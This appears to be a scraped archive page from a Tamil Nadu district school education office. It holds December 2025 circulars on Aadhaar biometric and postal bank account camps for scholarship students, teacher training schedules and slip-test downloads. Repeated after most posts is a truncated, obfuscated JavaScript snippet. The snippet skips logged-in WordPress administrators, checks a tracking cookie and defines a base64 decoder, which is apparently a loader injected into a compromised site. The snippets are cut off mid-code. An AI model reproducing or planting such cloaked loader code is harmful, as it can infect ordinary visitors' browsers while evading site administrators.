Month: December 2025

பள்ளிக் கல்வி-கல்வி உதவித் தொகை மற்றும் பெண்கல்வி ஊக்கத் தொகை- மாணவ/மாணவியர்களுக்கான ஆதார் பயோமெட்ரிக் புதுப்பித்தல் முகாம் மற்றும் புதிய போஸ்டல் வங்கிக் கணக்கு தொடங்குவதற்கான முகாம் நடைபெறுதல்-சார்பு.

2025-2026ஆம் கல்வியாண்டிற்கான கல்வி உதவித் தொகை மற்றும் பெண்கல்வி ஊக்கத் தொகை பெற மாணவ/மாணவியர்களுக்கான ஆதார் பயோமெட்ரிக் புதுப்பித்தல் முகாம் மற்றும் புதிய போஸ்டல் வங்கிக் கணக்கு தொடங்குவதற்கான முகாம் கீழ்காணும் இணைப்பில் உள்ள பள்ளிகளில் நடைபெற திட்டமிடப்பட்டுள்ளது. எனவே அனைத்து பள்ளி தலைமையாசிரியர்கள் முகாமில் தங்கள் பள்ளி மாணவர்களை பங்பெற செய்து அவர்களுக்கு ஆதார் பயோமெட்ரிக் புதுப்பித்தல் மற்றும் புதிய போஸ்டல் வங்கிக் கணக்கினை துவங்கச் செய்தல் வேண்டும். 05.12.2025, 08.12.2025 மற்றும் 09.12.2025 ஆகிய நாட்களில் நடைபெறவுள்ள முகாமினை முழுமையாக பயன்படுத்திக்கொள்ளுமாறு அனைத்து வகை பள்ளி தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. POSTAL CAMP DETAILS 01.12.2025.SCHEDULEDownload மாணவர்களின் பெயர் பட்டியல் 02.12.2025 அன்று Edwize Vellore இணையதளத்தில் பதிவேற்றம் செய்யப்பட்டுள்ளது. மேற்காண்

ஒருங்கிணைந்த பள்ளிக் கல்வி – வேலூர் மாவட்டம் – டிசம்பர் 2025 மாதத்திற்கான பள்ளி மேலாண்மைக் குழுக் கூட்டம் – 05.12.2025 அன்று நடத்துதல் – கூட்டப்பொருள் மற்றும் வழிகாட்டு நெறிமுறைகள் வழங்குதல் – சார்பு.

SS VLR DIST 051225 SMC RegDownload Proceedings for the SMC meeting scheduled on 05.12.2025-regDownload முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம் . (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

சுற்றறிக்கை

(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

slip test -04.12.2025-sslc &12th STD question set-reg

social 04.12.2025Download XII BIOLOGY - 04.12.2025Download XII BOTANY - 04.12.2025Download XII CS - 04.12.2025Download XII CA - 04.12.2025Download XII HISTORY - 04.12.2025Download (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

Slip test-8-03.12.2025 sslc &12th STD question set -reg

XII TAMIL - 03.12.2025Download 03.12.20250tm scienceDownload 03.12.2025 em sciDownload (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள பொருளியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள பொருளியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 08.12.2025 முதல் 20.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த பொருளியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: சென்னை மற்றும் மதுரை பயிற்சி நடைபெறும் நாள்- 08.12.2025 முதல் 20.12.2025 முடிய இணைப்பு பொருளியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் Economics Annexure 1&2Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getEl

பள்ளிக்கல்வி- கல்வி உதவித்தொகை-பெண் கல்வி ஊக்கத்தொகை-பிரீ மெட்ரிக் மற்றும் போஸ்ட் மெட்ரிக் கல்வி உதவித்தொகை பெறவிருக்கும் மாணவ/மாணவியர்களுக்கு ஆதார் சீடிங் செய்யப்பட்ட இந்திய போஸ்ட்பேமண்ட் வங்கி கணக்கு எண்  துவக்குதல் மற்றும் ஆதார் பயோமெட்ரிக் புதுபிக்கும் பொருட்டு  முகாம் நடைபெறுதல் –முன் ஏற்பாடுகள் செய்ய தெரிவித்தல்  -சார்பு.

சார்ந்த பள்ளி தலைமையாசிரியர்கள் கவனத்திற்கு. scholarship.circular (1)Download POSTAL CAMP DETAILS 01.12.2025.SCHEDULEDownload 27.11.2025 NPCI details (2)Download post.acc.formDownload /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள கணிதவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

December 2, 2025 by ceo வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள கணிதவியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 08.12.2025 முதல் 13.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த கணிதவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: சென்னை, திருச்சி, சேலம் மற்றும் வேலூர். பயிற்சி நடைபெறும் நாள்- 08.12.2025 முதல் 13.12.2025 முடிய இணைப்பு கணிதவியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் TPD Maths Annexure 1&2 (1)Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (functi

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள தாவரவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள தாவரவியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 11.12.2025 முதல் 17.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த தாவரவியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: சேலம் பயிற்சி நடைபெறும் நாள்- 11.12.2025 முதல் 17.12.2025 முடிய இணைப்பு தாவரவியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் PG Botany YERCAUD TRAING 11.12.2025 TO 13.12.2025 AND 15.12.2025 (2)Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.get

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – திறன் மேம்பாட்டு பயிற்சி – இணைப்பில் உள்ள வேதியியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை கலந்து கொள்ள தெரிவித்தல் -தொடர்பாக

வேலூர் மாவட்டத்தில் உள்ள அரசு /நகரவை / மேல்நிலைப் பள்ளிகளில் பணிபுரியும் இணைப்பில் குறிப்பிடப்பட்டுள்ள வேதியியல் பாட முதுகலை   பட்டதாரி ஆசிரியர்களுக்கு திறன் மேம்பாட்டு பயிற்சி மண்டல அளவில் உண்டு உறைவிடப் பயிற்சியாக 04.12.2025 முதல் 13.12.2025 வரை நடைபெறவுள்ளது. இணைப்பில் குறிப்பிடப்பட்டுள்ள பள்ளித்தலைமையாசிரியர்கள் சார்ந்த வேதியியல் பாட முதுகலை பட்டதாரி ஆசிரியர்களை பணியிலிருந்து உரிய நாளில் பணிவிடுவிப்பு செய்ய சார்ந்த பள்ளித் தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. இடம்: சென்னை, மதுரை, கோயம்புத்தூர் மற்றும் வேலூர் பயிற்சி நடைபெறும் நாள்- 04.12.2025 முதல் 13.12.2025 முடிய இணைப்பு வேதியியல் பாட முதுகலை பட்டதாரி ஆசிரியர் பெயர் மற்றும் பள்ளியின் பெயர் Chemistry Annexure 12 updated (1) (1)-23-28Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{i